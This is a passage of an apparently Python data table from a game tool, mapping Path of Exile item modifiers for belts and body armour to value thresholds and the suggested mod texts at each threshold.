"#% increased Elemental Damage": [(20, '8% increased Elemental Damage'), (40, '(9 - 10)% increased Elemental Damage'), (60, '(11 - 12)% increased Elemental Damage'), (80, '(13 - 14)% increased Elemental Damage'), (200, '(15 - 16)% increased Elemental Damage')],
"#% increased Elemental Damage with Attack Skills": [(40, '(12 - 13)% increased Elemental Damage with Attack Skills'), (80, '(14 - 15)% increased Elemental Damage with Attack Skills'), (115, '(16 - 18)% increased Elemental Damage with Attack Skills'), (130, '(19 - 21)% increased Elemental Damage with Attack Skills'), (200, '(22 - 24)% increased Elemental Damage with Attack Skills\nDamage with Weapons Penetrates (4 - 6)% Fire Resistance\nDamage with Weapons Penetrates (4 - 6)% Cold Resistance\nDamage with Weapons Penetrates (4 - 6)% Lightning Resistance')],
"#% increased Energy Shield from Body Armour": [(20, '(8 - 9)% increased Energy Shield Recharge Rate'), (40, '(10 - 11)% increased Energy Shield Recharge Rate'), (100, '(12 - 15)% increased Energy Shield Recharge Rate\n(10 - 15)% increased Energy Shield Recovery rate')],
"#% increased Fire Damage": [(20, '(9 - 10)% increased Fire Damage'), (40, '(11 - 12)% increased Fire Damage'), (60, '(13 - 14)% increased Fire Damage'), (80, '(15 - 16)% increased Fire Damage'), (200, '(17 - 20)% increased Fire Damage')],
"#% increased Flask Charges gained": [(30, '(10 - 11)% increased Flask Charges gained'), (60, '(12 - 13)% increased Flask Charges gained'), (80, '(14 - 15)% increased Flask Charges gained'), (150, '(14 - 15)% increased Flask Charges gained\nRemove Ignite and Burning when you use a Flask')],
"#% increased Flask Effect Duration": [(20, '(10 - 11)% increased Flask Effect Duration'), (40, '(12 - 13)% increased Flask Effect Duration'), (50, '(14 - 15)% increased Flask Effect Duration'), (100, '(14 - 15)% increased Flask Effect Duration\nRemove Shock when you use a Flask')],
"#% increased Flask Life Recovery rate": [(25, '(5.0 - 7.0) Life Regenerated per second'), (50, '(7.02 - 11.67) Life Regenerated per second'), (75, '(11.68 - 18.33) Life Regenerated per second'), (150, '(11.68 - 18.33) Life Regenerated per second\n(10 - 15)% increased Life Recovery rate')],
"#% increased Flask Mana Recovery rate": [(25, '(16 - 18)% increased Mana Regeneration Rate'), (50, '(19 - 21)% increased Mana Regeneration Rate'), (70, '(22 - 24)% increased Mana Regeneration Rate'), (100, '(22 - 24)% increased Mana Regeneration Rate\n(10 - 15)% increased Mana Recovery rate')],
"#% increased Global Physical Damage": [(20, '(9 - 10)% increased Global Physical Damage'), (40, '(11 - 12)% increased Global Physical Damage'), (60, '(13 - 14)% increased Global Physical Damage'), (80, '(15 - 16)% increased Global Physical Damage'), (200, '(17 - 20)% increased Global Physical Damage')],
"#% increased Life Recovery from Flasks": [(40, '4% increased maximum Life'), (80, '(5 - 6)% increased maximum Life'), (200, '(7 - 8)% increased maximum Life\n(10 - 15)% increased Life Recovery rate')],
"#% increased Lightning Damage": [(20, '(9 - 10)% increased Lightning Damage'), (40, '(11 - 12)% increased Lightning Damage'), (60, '(13 - 14)% increased Lightning Damage'), (80, '(15 - 16)% increased Lightning Damage'), (200, '(17 - 20)% increased Lightning Damage')],
"#% increased Mana Recovery rate": [(15, '(22 - 24)% increased Mana Regeneration Rate'), (30, '(25 - 27)% increased Mana Regeneration Rate'), (100, '(28 - 30)% increased Mana Regeneration Rate\n(10 - 15)% increased Mana Recovery rate')],
"#% increased Movement Speed during any Flask Effect": [(11, '4% increased Movement Speed'), (25, '(5 - 6)% increased Movement Speed'), (50, '(7 - 8)% increased Movement Speed')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(18 - 25)% increased Stun Duration on Enemies\n(20 - 25)% increased Area of Effect if you have Stunned an Enemy Recently')],
"#% increased Stun and Block Recovery": [(50, '(10 - 11)% chance to Avoid being Stunned'), (80, '(12 - 13)% chance to Avoid being Stunned'), (150, '(14 - 15)% chance to Avoid being Stunned\n100% chance to avoid Bleeding')],
"#% increased Trap Throwing Speed": [(30, '(2 - 3)% increased Trap Throwing Speed'), (100, '(4 - 5)% increased Trap Throwing Speed')],
"#% of Life Regenerated per second during any Flask Effect": [(2.5, '(0.6 - 0.7)% of Life Regenerated per second'), (5.0, '(0.8 - 0.93)% of Life Regenerated per second'), (8.33, '1.0% of Life Regenerated per second')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Flask Charges used": [(20, '(11 - 10)% reduced Flask Charges used'), (40, '(13 - 12)% reduced Flask Charges used'), (50, '(15 - 14)% reduced Flask Charges used'), (100, '(15 - 14)% reduced Flask Charges used\nRemove Chill and Freeze when you use a Flask')],
"+# to Armour": [(500, '(7 - 9)% increased Armour'), (1000, '(10 - 12)% increased Armour'), (1500, '(13 - 15)% increased Armour'), (2000, '(13 - 15)% increased Armour\n(4 - 6)% additional Physical Damage Reduction while affected by Determination')],
"+# to Armour and Evasion Rating": [(350, '(7 - 9)% increased Armour\n(7 - 9)% increased Evasion Rating'), (700, '(10 - 12)% increased Armour\n(10 - 12)% increased Evasion Rating'), (1500, '(13 - 15)% increased Armour\n(13 - 15)% increased Evasion Rating')],
"+# to Dexterity": [(100, '(7 - 9)% increased Dexterity'), (130, '(10 - 12)% increased Dexterity'), (160, '(13 - 15)% increased Dexterity'), (200, '(13 - 15)% increased Dexterity\n6% increased Evasion Rating per Frenzy Charge')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(150, '(7 - 9)% increased Evasion Rating'), (300, '(10 - 12)% increased Evasion Rating'), (450, '(13 - 15)% increased Evasion Rating'), (1000, '(13 - 15)% increased Evasion Rating\n(16 - 25)% chance to Avoid Elemental Ailments'), (1000, '(13 - 15)% increased Evasion Rating\n(4 - 6) chance to Evade Attacks while affected by Grace')],
"+# to Intelligence": [(100, '(7 - 9)% increased Intelligence'), (130, '(10 - 12)% increased Intelligence'), (160, '(13 - 15)% increased Intelligence'), (200, '(13 - 15)% increased Intelligence\n6% increased Spell Damage per Power Charge')],
"+# to Strength": [(100, '(7 - 9)% increased Strength'), (130, '(10 - 12)% increased Strength'), (160, '(13 - 15)% increased Strength'), (200, '(13 - 15)% increased Strength\n0.3% of maximum Life Regenerated per second per Endurance Charge')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to maximum Energy Shield": [(50, '(7 - 9)% increased maximum Energy Shield'), (100, '(10 - 13)% increased maximum Energy Shield'), (130, '(14 - 16)% increased maximum Energy Shield'), (500, '(14 - 16)% increased maximum Energy Shield\n(1.2 - 2.2)% of Maximum Energy Shield Regenerated per Second while affected by Discipline')],
"+# to maximum Life": [(200, '4% increased maximum Life'), (280, '(5 - 6)% increased maximum Life'), (1000, '(7 - 8)% increased maximum Life')],
"+#% chance to Evade Attacks": [(3, '(7 - 9)% increased Evasion Rating'), (5, '(10 - 12)% increased Evasion Rating'), (10, '(13 - 15)% increased Evasion Rating\n(16 - 25)% chance to Avoid Elemental Ailments')],
"+#% to Chaos Resistance": [(100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n100% chance to Avoid being Poisoned')],
"+#% to Chaos Resistance during any Flask Effect": [(60, '(5 - 6) to Chaos Resistance'), (120, '(7 - 8) to Chaos Resistance'), (500, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '(11 - 12) to Cold Resistance'), (100, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\n100% chance to Avoid being Frozen')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '(11 - 12) to Fire Resistance'), (100, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\n100% chance to Avoid being Ignited')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Lightning Resistance": [(50, '(11 - 12) to Lightning Resistance'), (100, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\n100% chance to Avoid being Shocked')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"Damage Penetrates #% Elemental Resistances during any Flask Effect": [(6, '(11 - 12)% increased Elemental Damage'), (12, '(13 - 14)% increased Elemental Damage'), (50, '(15 - 16)% increased Elemental Damage')],
"Minions have #% increased maximum Life": [(40, 'Minions have (7 - 9)% increased maximum Life'), (80, 'Minions have (10 - 12)% increased maximum Life'), (150, 'Minions have (13 - 15)% increased maximum Life')],
"Reflects # Physical Damage to Melee Attackers": [(10, 'Reflects (10 - 15) Physical Damage to Melee Attackers'), (20, 'Reflects (16 - 40) Physical Damage to Melee Attackers'), (30, 'Reflects (41 - 80) Physical Damage to Melee Attackers'), (1000, 'Reflects (41 - 80) Physical Damage to Melee Attackers\n(19 - 20) to Global Critical Strike Multiplier')],
"Vaal Skills deal #% increased Damage": [(55, 'Vaal Skills deal (13 - 16)% increased Damage'), (110, 'Vaal Skills deal (17 - 21)% increased Damage'), (200, 'Increases and Reductions to Damage of Vaal Skills also apply to Non-Vaal Skills')],
"Your Critical Strike Chance is Lucky while Focussed": [(1, '(14 - 15)% increased Global Critical Strike Chance'), (2, '(16 - 17)% increased Global Critical Strike Chance'), (5, '(18 - 20)% increased Global Critical Strike Chance')],
},
"Body Armour": {
"# Energy Shield Regenerated per second while a Rare or Unique Enemy is Nearby": [(333.33, '(0.6 - 0.7)% of Energy Shield Regenerated per second'), (416.67, '(0.8 - 0.9)% of Energy Shield Regenerated per second')],
"# Life Regenerated per second": [(16.67, '(5.0 - 7.0) Life Regenerated per second'), (29.17, '(7.02 - 11.67) Life Regenerated per second'), (41.67, '(11.68 - 18.33) Life Regenerated per second'), (50.0, '(18.35 - 26.67) Life Regenerated per second'), (54.17, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second'), (58.33, '(26.68 - 40.0) Life Regenerated per second\n(0.8 - 0.93)% of Life Regenerated per second'), (83.33, '(26.68 - 40.0) Life Regenerated per second\n1.0% of Life Regenerated per second')],
"#% Chance to Block Attack Damage": [(19, '2% Chance to Block Attack Damage'), (50, '(4 - 5)% Chance to Block Attack Damage')],
"#% additional Physical Damage Reduction": [(5, '2% additional Physical Damage Reduction'), (9, '3% additional Physical Damage Reduction'), (50, '4% additional Physical Damage Reduction')],
"#% chance to Avoid Cold Damage when Hit": [(14, '(11 - 12) to Cold Resistance'), (27, '(13 - 14) to Cold Resistance'), (50, '(15 - 16) to Cold Resistance\n1 to maximum Cold Resistance')],
"#% chance to Avoid Elemental Ailments": [(30, '(15 - 20)% reduced Elemental Ailment Duration on you'), (60, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you\n(16 - 25)% chance to Avoid Elemental Ailments')],
"#% chance to Avoid Elemental Damage from Hits during Soul Gain Prevention": [(20, '(3 - 4) to all Elemental Resistances'), (50, '(5 - 6) to all Elemental Resistances')],
"#% chance to Avoid Fire Damage when Hit": [(14, '(11 - 12) to Fire Resistance'), (27, '(13 - 14) to Fire Resistance'), (50, '(15 - 16) to Fire Resistance\n1 to maximum Fire Resistance')],
"#% chance to Avoid Lightning Damage when Hit": [(14, '(11 - 12) to Lightning Resistance'), (27, '(13 - 14) to Lightning Resistance'), (50, '(15 - 16) to Lightning Resistance\n1 to maximum Lightning Resistance')],
"#% chance to Avoid being Poisoned": [(55, '(14 - 16)% chance to Avoid being Poisoned'), (110, '(18 - 21)% chance to Avoid being Poisoned'), (200, '(22 - 25)% chance to Avoid being Poisoned')],
"#% chance to Dodge Attack Hits": [(25, '2% chance to Dodge Attack Hits'), (50, '(4 - 5)% chance to Dodge Attack Hits')],
"#% chance to Dodge Spell Hits": [(20, '2% chance to Dodge Spell Hits'), (50, '(4 - 5)% chance to Dodge Spell Hits')],
"#% chance to avoid Bleeding": [(55, '(14 - 16)% chance to avoid Bleeding'), (110, '(18 - 21)% chance to avoid Bleeding'), (200, '(22 - 25)% chance to avoid Bleeding')],
"#% chance to gain Onslaught for 3 seconds when Hit": [(210, '4% increased Movement Speed'), (500, '(5 - 6)% increased Movement Speed\n(10 - 12)% increased Attack and Cast Speed during Onslaught')],
"#% chance to gain a Frenzy Charge when Hit": [(25, '3% increased Attack and Cast Speed'), (50, '4% increased Attack and Cast Speed'), (100, '5% increased Attack and Cast Speed')],
"#% chance to gain an additional Vaal Soul on Kill": [(50, '5% reduced Damage taken if Corrupted')],
"#% increased Area of Effect": [(11, '(5 - 6)% increased Area of Effect'), (21, '(7 - 8)% increased Area of Effect'), (50, '(9 - 10)% increased Area of Effect')],
"#% increased Armour": [(100, '(15 - 18)% increased Armour'), (175, '(19 - 22)% increased Armour'), (250, '(23 - 26)% increased Armour'), (325, '(27 - 30)% increased Armour'), (400, '(30 - 35)% increased Armour'), (1000, '(15 - 20)% chance when Hit for double Armour effect')],
"#% increased Armour and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(23 - 25)% increased Energy Shield'), (1000, '(15 - 20)% chance when Hit for double Armour effect\n(10 - 15)% increased Energy Shield Recovery rate')],
"#% increased Armour and Evasion": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating'), (1000, '(15 - 20)% chance when Hit for double Armour effect\n(10 - 15)% Global chance to Blind Enemies on hit')],
"#% increased Armour, Evasion and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '(15 - 20)% chance when Hit for double Armour effect\n(10 - 15)% Global chance to Blind Enemies on hit\n(10 - 15)% increased Energy Shield Recovery rate')],
"#% increased Attributes": [(17, '2% increased Attributes'), (50, '3% increased Attributes')],
"#% increased Effect of Auras on you": [(65, 'Determination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation'), (100, 'Determination has (15 - 20)% increased Aura Effect\nGrace has (15 - 20)% increased Aura Effect\nDiscipline has (15 - 20)% increased Aura Effect')],
"#% increased Effect of Fortify on you while Focussed": [(150, '5% increased Effect of Fortify on you'), (300, '10% increased Effect of Fortify on you'), (500, '15% increased Effect of Fortify on you')],
"#% increased Energy Shield": [(100, '(15 - 16)% increased Energy Shield'), (175, '(17 - 18)% increased Energy Shield'), (250, '(19 - 20)% increased Energy Shield'), (325, '(21 - 22)% increased Energy Shield'), (400, '(23 - 25)% increased Energy Shield'), (1000, '(10 - 15)% increased Energy Shield Recovery rate')],
"#% increased Evasion Rating": [(100, '(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Evasion Rating'), (1000, '(10 - 15)% Global chance to Blind Enemies on hit')],
"#% increased Evasion and Energy Shield": [(100, '(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '(10 - 15)% Global chance to Blind Enemies on hit\n(10 - 15)% increased Energy Shield Recovery rate')],
"#% increased Stun and Block Recovery": [(30, '(10 - 12)% increased Stun and Block Recovery'), (60, '(13 - 15)% increased Stun and Block Recovery'), (90, '(16 - 18)% increased Stun and Block Recovery'), (110, '(19 - 21)% increased Stun and Block Recovery'), (130, '(22 - 25)% increased Stun and Block Recovery'), (160, '(14 - 15)% chance to Avoid being Stunned')],
"#% of Damage is taken from Mana before Life": [(25, '(2 - 3)% of Physical Damage is taken from Mana before Life when Hit'), (50, '(4 - 5)% of Physical Damage is taken from Mana before Life when Hit')],
"#% of Damage is taken from Mana before Life while Focussed": [(60, '(2 - 3)% of Physical Damage is taken from Mana before Life when Hit'), (200, '(4 - 5)% of Physical Damage is taken from Mana before Life when Hit')],
"#% of Energy Shield Regenerated per second": [(1.33, '(0.6 - 0.7)% of Energy Shield Regenerated per second'), (2.0, '(0.8 - 0.9)% of Energy Shield Regenerated per second'), (8.33, '1.0% of Energy Shield Regenerated per second')],
"#% of Evasion Rating is Regenerated as Life per second while Focussed": [(2.83, '(0.6 - 0.7)% of Life Regenerated per second'), (8.33, '(0.8 - 0.93)% of Life Regenerated per second')],
"#% of Life Regenerated per second": [(1.17, '(11.68 - 18.33) Life Regenerated per second'), (2.33, '(18.35 - 26.67) Life Regenerated per second'), (5.0, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second')],
"#% of Physical Damage from Hits taken as Cold Damage": [(16, '(11 - 12) to Cold Resistance'), (32, '(13 - 14) to Cold Resistance'), (100, '(15 - 16) to Cold Resistance\n(7 - 10)% of Physical Damage from Hits taken as Cold Damage')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '1% reduced Damage taken per 250 Strength\n1% reduced Damage taken per 250 Dexterity\n1% reduced Damage taken per 250 Intelligence')],
"#% reduced Chaos Damage taken over time": [(30, '(5 - 6) to Chaos Resistance'), (60, '(7 - 8) to Chaos Resistance'), (100, '(9 - 10) to Chaos Resistance\n1 to maximum Chaos Resistance')],
"#% reduced Elemental Ailment Duration on you": [(40, '(15 - 20)% reduced Elemental Ailment Duration on you'), (75, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you')],
"+# Physical Damage taken": [(100, '(-20 - -16) Physical Damage taken from Attacks'), (200, '(-25 - -21) Physical Damage taken from Attacks'), (500, '(-40 - -35) Physical Damage taken from Attacks')],
"+# to Armour": [(200, '(15 - 20) to Armour'), (400, '(21 - 30) to Armour'), (600, '(31 - 40) to Armour'), (800, '(41 - 55) to Armour'), (1100, '(56 - 70) to Armour\n2% additional Physical Damage Reduction'), (1450, '(56 - 70) to Armour\n3% additional Physical Damage Reduction'), (2000, '(56 - 70) to Armour\n4% additional Physical Damage Reduction')],
"+# to Armour during Soul Gain Prevention": [(8000, '(21 - 30) to Armour'), (15000, '(31 - 40) to Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, '(18 - 20) to Dexterity\n10% chance to gain a Frenzy Charge on Hit')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(175, '(15 - 20) to Evasion Rating'), (375, '(21 - 30) to Evasion Rating'), (575, '(31 - 40) to Evasion Rating'), (775, '(41 - 55) to Evasion Rating'), (1050, '(56 - 70) to Evasion Rating\n2 chance to Evade Attacks'), (1400, '(56 - 70) to Evasion Rating\n3 chance to Evade Attacks'), (2000, '(56 - 70) to Evasion Rating\n4 chance to Evade Attacks')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, '(18 - 20) to Intelligence\n15% chance to gain a Power Charge on Critical Strike')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, "(18 - 20) to Strength\nGain an Endurance Charge every second if you've been Hit Recently")],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Energy Shield": [(50, '(8 - 10) to maximum Energy Shield'), (100, '(11 - 14) to maximum Energy Shield'), (150, '(15 - 18) to maximum Energy Shield'), (200, '(19 - 23) to maximum Energy Shield'), (300, '(24 - 30) to maximum Energy Shield\n(0.6 - 0.7)% of Energy Shield Regenerated per second'), (370, '(24 - 30) to maximum Energy Shield\n(0.8 - 0.9)% of Energy Shield Regenerated per second'), (500, '(24 - 30) to maximum Energy Shield\n1.0% of Energy Shield Regenerated per second')],
"+# to maximum Life": [(100, '(8 - 10) to maximum Life'), (175, '(11 - 14) to maximum Life'), (250, '(15 - 19) to maximum Life'), (325, '(20 - 24) to maximum Life'), (400, '(25 - 30) to maximum Life\n4% increased maximum Life'), (475, '(5 - 6)% increased maximum Life'), (1000, '(8 - 10)% increased maximum Life')],
"+# to maximum Mana": [(50, '(8 - 10) to maximum Mana'), (100, '(11 - 14) to maximum Mana'), (150, '(15 - 19) to maximum Mana'), (175, '(20 - 24) to maximum Mana'), (200, '(25 - 30) to maximum Mana\n6% increased maximum Mana'), (500, '(7 - 8)% increased maximum Mana')],
"+# to maximum number of Zombies": [(1, 'Minions deal 8% increased Damage'), (2, 'Minions deal (9 - 10)% increased Damage'), (5, 'Minions deal (11 - 12)% increased Damage\nZombies deal (30 - 35)% increased Damage\nSkeletons deal (30 - 35)% increased Damage')],
"+#% Chaos Resistance against Damage Over Time": [(50, '(5 - 6) to Chaos Resistance'), (100, '(7 - 8) to Chaos Resistance'), (200, '(9 - 10) to Chaos Resistance\n1 to maximum Chaos Resistance')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n(5 - 8)% of Physical Damage from Hits taken as Chaos Damage')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\n(7 - 10)% of Physical Damage from Hits taken as Cold Damage')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\n(7 - 10)% of Physical Damage from Hits taken as Fire Damage')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\n(7 - 10)% of Physical Damage from Hits taken as Lightning Damage')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"Gain #% of Maximum Life as Extra Maximum Energy Shield": [(26, '(11 - 14) to maximum Energy Shield'), (50, '(15 - 18) to maximum Energy Shield\nGain 3% of Maximum Life as Extra Maximum Energy Shield')],
"Has 1 Abyssal Socket": [(1, '(2 - 3)% additional Physical Damage Reduction against Abyssal Monsters'), (2, '(4 - 5)% additional Physical Damage Reduction against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Item drops on Death if Equipped by an Animated Guardian": [(2, '15 to Animated Guardian Elemental Resistances'), (5, 'Item drops on Death if Equipped by an Animated Guardian')],
"Minions have #% increased maximum Life": [(40, 'Minions have (7 - 9)% increased maximum Life'), (80, 'Minions have (10 - 12)% increased maximum Life'), (150, 'Minions have (13 - 15)% increased maximum Life')],
"Recover #% of Mana and Energy Shield when you Focus": [(85, '(19 - 21)% increased Mana Regeneration Rate\n(8 - 9)% increased Energy Shield Recharge Rate'), (150, '(22 - 24)% increased Mana Regeneration Rate\n(10 - 11)% increased Energy Shield Recharge Rate')],
"Reflects # Physical Damage to Melee Attackers": [(300, 'Reflects (10 - 15) Physical Damage to Melee Attackers'), (450, 'Reflects (16 - 40) Physical Damage to Melee Attackers'), (550, 'Reflects (41 - 80) Physical Damage to Melee Attackers'), (1000, 'Reflects (41 - 80) Physical Damage to Melee Attackers\nAttacks have (0.5 - 1.0) to Critical Strike Chance\nSpells have (0.5 - 1.0) to Critical Strike Chance ')],
